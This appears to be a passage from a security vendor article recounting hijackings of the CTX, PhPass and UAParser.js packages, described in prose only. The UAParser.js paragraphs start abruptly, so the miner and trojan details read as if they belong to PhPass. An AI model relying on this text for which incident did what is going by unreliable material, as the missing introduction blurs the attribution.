A recent example of repository hijacking came in May 2022 in the form of Python package CTX, which had its repository hijacked on popular Python package hosting site PyPI. In this case, the original domain-hosting email for the owner account expired, leaving it open to a password reset and domain reregistration by a third party. It is unclear how much time elapsed between the account expiring and the successful hijacking attempt, but once the hijack was initiated, it took the attacker just 40 minutes to begin uploading malicious versions of the package, replacing the original versions.
This takeover went undiscovered for 10 days. During that time, malicious versions of CTX were downloaded over 27,000 times.
As for the malicious code, a section of code was added in the ctx.py file, which exfiltrated the environmental variables of a user and sent the data to an external endpoint, in this case a hosted Heroku server. The exfiltrated data potentially included sensitive user information, such as API keys and passwords, which were stored as environmental variables, making them easily accessible.
PyPI administrators moved quickly to suspend the hijacked account and remove all versions, malicious and original, of CTX, which at the time of this writing has not been reinstated.
This vulnerability was covered in Black Duck® Security Advisory BDSA-2022-1523.
Similarly, PHP package PhPass, which is hosted on the Packagist PHP hosting platform and GitHub, was exploited in the same way in May 2022. The original owner’s account was deleted and reregistered by a bad actor, giving access to the original repository. Using this access, original package versions were replaced with malicious versions.
The malicious code contained in these replacement versions carried out the same action as the CTX takeover—extracting environmental variables to the very same endpoint.
As a solution to this issue, a forked repository was created containing the original, nonmalicious versions. To ensure no further downloads of versions on the malicious repo, Packagist rerouted the original download URL to the new fork.
This vulnerability was covered in Black Duck Security Advisory BDSA-2022-1526.
The code introduced in these malicious versions had particularly harmful impacts. Notably, on install, the code downloaded and execute binaries from a remote server. One such binary was cryptocurrency mining software, demonstrating the ability for a remote attacker to take control of the victim’s system. Another such binary, introduced only on Windows systems, was a trojan that exfiltrated sensitive information from the system.
Hours after the UAParser.js attack, the author of the package removed the compromised versions from npm and released three new versions (0.7.30, 0.8.1, and 1.0.1) to help mitigate automatic projected upgrades from retaining the malicious versions.
This vulnerability was covered in Black Duck Security Advisory BDSA-2021-3228.